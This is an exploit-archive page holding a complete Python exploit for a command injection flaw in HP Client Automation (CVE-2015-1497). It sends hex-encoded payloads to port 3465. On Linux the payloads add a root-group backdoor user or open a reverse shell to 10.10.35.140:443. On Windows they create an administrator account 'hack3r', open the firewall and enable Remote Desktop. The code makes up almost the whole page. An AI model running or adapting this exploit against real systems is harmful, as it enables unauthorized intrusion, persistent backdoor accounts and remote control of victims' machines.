HP Client Automation 7.9 Command Injection

HP Client Automation 7.9 Command Injection: Posted Oct 10, 2016; Authored by slidingwindow0xff; HP Client Automation remote command injection exploit that adds backdoor accounts and provides a reverse shell. Author tested on version 7.9 but believes it should also work on 8.1, 9.0, and 9.1.; tags | exploit, remote, shell; advisories | CVE-2015-1497; SHA-256 | 21071151f479044290767d7497c10787d8aae743a7b1d0070b60601cbca11962; Download | Favorite | View

HP Client Automation 7.9 Command Injection

# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on  8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]

#Can run following command on linux target
  #Useradd Payload: hide hide  sh -c ' useradd amiroot -p ID/JlXFIWowsE  -g root'
  #Reverse Shell Payload: hide hide   sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"


#Runs following command on Windows target
  #hide hide   cmd.exe /c net user hack3r "hack3r" /add
  #hide hide   cmd.exe /c net localgroup administrators hack3r /add
  #hide hide   cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
  #hide hide   cmd.exe /c netsh firewall set service RemoteDesktop enable
  #hide hide   cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
  #hide hide   cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


import sys,socket

print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")

def exploit_Linux(target_IP,exploit_param):
  if exploit_param == "1":
    print("\n[+]Adding privileged user amiroot/nopass")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)

    response = s.recv(1024)

    if response == "\x00":
      print("[+]Successfully added user amiroot/nopass")
    else:
      print("[-]Failed to add user amiroot/nopass")
    s.close()

  elif exploit_param == "2":
    print("\n[+]Trying to get a reverse shell")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"

    #Change this
    #Reverse Shell Payload: hide hide  sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)

    response = s.recv(1024)

    if response == "\x00":
      print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")
    else:
      print("[-]Failed to get reverse shell")
    s.close()

  else:
    print("\n[-]Invalid exploit parameter provided for Linux target")
    sys.exit()


def exploit_Windows(target_IP):
  
  counter = 0
  print("[+]Adding a local user hack3r/hack3r")

  request = "\x00"
  request+= "\x31\x32\x33\x31\x32\x33\x00"
  request+= "\x41\x42\x43\x00"
  request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target_IP, 3465))
  s.send(request)

  response = s.recv(1024)

  if response == "\x00":
    print("[+]Successfully added user hack3r/hack3r")
    counter+= 1
  else:
    print("[-]Failed to add user hack3r/hack3r")
  s.close()


  print("[+]Adding user 'hack3r' to Local Administrator's group")
  request = "\x00"
  request+= "\x31\x32\x33\x31\x32\x33\x00"
  request+= "\x41\x42\x43\x00"
  request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target_IP, 3465))
  s.send(request)
  response = s.recv(1024)

  if response == "\x00":
    print("[+]Successfully added user 'hack3r' to Local Administrators group")
    counter+= 1
  else:
    print("[-]Failed to add user to 'hack3r' Local Administrators group")
  s.close()

  #Add user Hack3r to "Remote Desktop Users" Group
  print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")
  request = "\x00"
  request+= "\x31\x32\x33\x31\x32\x33\x00"
  request+= "\x41\x42\x43\x00"
  request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target_IP, 3465))
  s.send(request)
  response = s.recv(1024)
  
  if response == "\x00":
    print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")
    counter+= 1
  else:
    print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")
  s.close()

  #Enable RDP
  print("[+]Trying to enable Remote Desktop Service")
  request = "\x00"
  request+= "\x31\x32\x33\x31\x32\x33\x00"
  request+= "\x41\x42\x43\x00"
  request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target_IP, 3465))
  s.send(request)
  response = s.recv(1024)
  
  if response == "\x00":
    print("[+]Successfully enabled Remote Desktop Service")
    counter+= 1
  else:
    print("[-]Failed to enable Remote Desktop Service")
  s.close()


  #Enable RDP for all profiles
  print("[+]Trying to enable Remote Desktop Service for all firewall profiles")
  request = "\x00"
  request+= "\x31\x32\x33\x31\x32\x33\x00"
  request+= "\x41\x42\x43\x00"
  request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target_IP, 3465))
  s.send(request)
  response = s.recv(1024)
  
  if response == "\x00":
    print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")
    counter+= 1
  else:
    print("[-]Failed to enable Remote Desktop Service for all firewall  profiles")
  s.close()

  #Setup target to listen for RDP connections
  print("[+]Setting up the target server to listen to RDP connections")
  request = "\x00"
  request+= "\x31\x32\x33\x31\x32\x33\x00"
  request+= "\x41\x42\x43\x00"
  request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target_IP, 3465))
  s.send(request)
  response = s.recv(1024)
  
  if response == "\x00":
    print("[+]Successfully setup the target server to listen to RDP connections")
    counter+= 1
  else:
    print("[-]Failed to setup the target server to listen to RDP connections")
  s.close()

  if counter == 6:
    print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")
  else:
    print("\n[-]Exploit Failed..")

#main() function here
def main():
  
  if len(sys.argv) < 2:
    print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell"
    sys.exit()

  target_IP = sys.argv[1]
  target_OS = sys.argv[2].lower()
  
  if target_OS == "windows":
    exploit_Windows(target_IP)
  elif target_OS == "linux":
    exploit_param = sys.argv[3]
    exploit_Linux(target_IP,exploit_param)
  else:
    print("\n[-]Invalid taret Operating System selected.")
    sys.exit()
    
if __name__ == '__main__':
  main()

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

HP Client Automation 7.9 Command Injection

HP Client Automation 7.9 Command Injection

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HP Client Automation 7.9 Command Injection

Share This

HP Client Automation 7.9 Command Injection

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems